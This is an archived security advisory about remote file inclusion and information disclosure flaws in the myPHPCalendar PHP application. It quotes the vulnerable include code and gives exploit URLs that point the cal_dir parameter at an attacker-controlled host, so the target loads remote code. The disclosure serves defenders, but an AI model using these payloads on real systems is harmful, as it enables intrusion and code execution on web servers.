Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: expl0987.txt

myPHPCalendar : Informations Disclosure, File Include




Informations :
ררררררררררררר
Language : PHP
Version : 10192000 Build 1 Beta
Website : <http://myphpcalendar.sourceforge.net/>
Problems :
- Informations Disclosure
- File Include


PHP Code/Location :
ררררררררררררררררררר

admin.php, contacts.php, convert-date.php :

------------------------
include ("globals.inc");
------------------------

globals.inc :

------------------------------
include($cal_dir."vars.inc");
include($cal_dir."prefs.inc");
------------------------------


index.php :

----------------------------------------
include ($cal_dir."globals.inc");
[...]
include($cal_dir."sql.inc");
----------------------------------------


setup.php :

----------------------------------------------------------------
$fp = fopen("setup.inc", "w+");
fputs($fp, "<?php\n");
fputs($fp, "\$url = \"".$URL."\";\n");
fputs($fp, "\$mainscript = \"".$MAINSCRIPT."\";\n");
fputs($fp, "\$mysql_server = \"".$MYSQL_SERVER."\";\n");
fputs($fp, "\$mysql_username = \"".$MYSQL_USERNAME."\";\n");
fputs($fp, "\$mysql_pass = \"".$MYSQL_PASS."\";\n");
fputs($fp, "\$database_name = \"".$DATABASE_NAME."\";\n");
fputs($fp, "\$db_type = \"".$DB_TYPE."\";\n");
fputs($fp, "\$user_text = \"".$USER_TEXT."\";\n");
fputs($fp, "\$crypt_type = \"".$CRYPT_TYPE."\";\n");
fputs($fp, "\$display_username = \"".$DISPLAY_USERNAME."\";\n");
fputs($fp, "\$maxdisplay = \"".$MAXDISPLAY."\";\n");
fputs($fp, "\$admin_email = \"".$ADMIN_EMAIL."\";\n");
----------------------------------------------------------------


Exploits :
רררררררר

<http://[target]/admin.php?cal_dir=http://[attacker]/>
<http://[target]/contacts.php?cal_dir=http://[attacker]/>
<http://[target]/convert-date.php?cal_dir=http://[attacker]/>

will include the files :

<http://[attacker]/vars.inc> and/or <http://[attacker]/prefs.inc>

and <http://[target]/index.php?cal_dir=http://[attacker]/> will include the 
files :
<http://[target]/globals.inc> <http://[target]/sql.inc>



Patch :
ררררררר
A patch and more details can be found on <http://www.phpsecure.info>.




frog-m@n <mailto:frog-m@n>

_________________________________________________________________
Utilisez votre MSN Messenger via votre GSM ! 
<http://www.fr.msn.be/gsm/servicesms/messengerparsms>


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH